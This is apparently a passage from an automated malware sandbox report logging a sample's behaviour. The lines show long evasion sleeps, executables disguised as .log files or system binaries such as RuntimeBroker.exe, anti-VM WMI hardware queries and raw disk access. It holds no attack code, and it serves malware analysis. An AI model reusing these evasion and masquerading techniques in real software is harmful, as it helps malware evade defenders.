                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594313
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594198
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594078
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593969
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593844
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593735
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593250
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593141
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592985
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592846
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592375
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592157
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592032
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591903
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591578
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591468
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591235
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591110
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWindow / User API: threadDelayed 3866
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWindow / User API: threadDelayed 1627
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4378
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 437
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4815
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4895
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3995
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4514
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 367
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWindow / User API: threadDelayed 4252
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWindow / User API: threadDelayed 5368
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\hSShNgSi.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\yzZxaXSF.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\eSWSCFMK.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\NWsvAoLz.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\nweImycr.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\VRHDyDUj.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\quERYeDq.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\fAbTigaR.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ekLJkSsv.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\wHsyCTFf.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\LionObPB.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\EkAnmMVM.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\rrfZteSl.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZpKsdnCB.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\GNRoGDmH.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\kdoiNyxj.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\QwkEqgro.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\HScOGmcH.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\BazpdGXT.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\DEgxfiAU.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\cnkBPSdA.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ndjISZpy.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\JNNDResf.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\wexYWbhZ.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEEtYbtY.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\IhtNKAXm.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\WoNdSLwd.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\oQGhqvNX.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\UMwcyUfj.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\BuKwfPUT.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -15679732462653109s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -600000s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599890s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599781s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599671s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599562s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599453s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -100000s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99883s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99766s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99657s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99544s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99422s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99313s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99199s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99084s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98954s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98829s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98704s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98579s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98454s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98329s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98204s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98094s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -97954s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -597229s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -597094s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596969s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596794s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596617s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6280Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 6296Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7108Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 3192Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 5752Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 4378 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 437 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 4815 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 4895 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 230 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 3995 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 4514 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 367 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3872Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -599853s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676Thread sleep time: -21600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598907s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598203s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597563s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597344s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597094s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596938s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596766s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596640s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596531s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596422s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596259s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596107s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595954s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595828s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595580s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595438s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595266s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595140s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595014s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594906s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594797s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594688s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594563s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594438s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594313s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594198s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594078s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593969s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593844s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593735s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593610s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593485s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593360s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593250s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593141s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592985s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592846s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592610s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592485s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592375s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592266s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592157s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592032s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591903s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591797s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591688s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591578s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591468s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591360s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591235s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591110s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 1984Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7500Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 600000
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599890
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599781
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599671
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599562
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599453
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 100000
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99883
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99766
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99657
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99544
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99422
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99313
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99199
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99084
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98954
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98829
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98704
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98579
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98454
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98329
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98204
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98094
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 97954
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597229
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597094
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596969
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596794
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596617
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
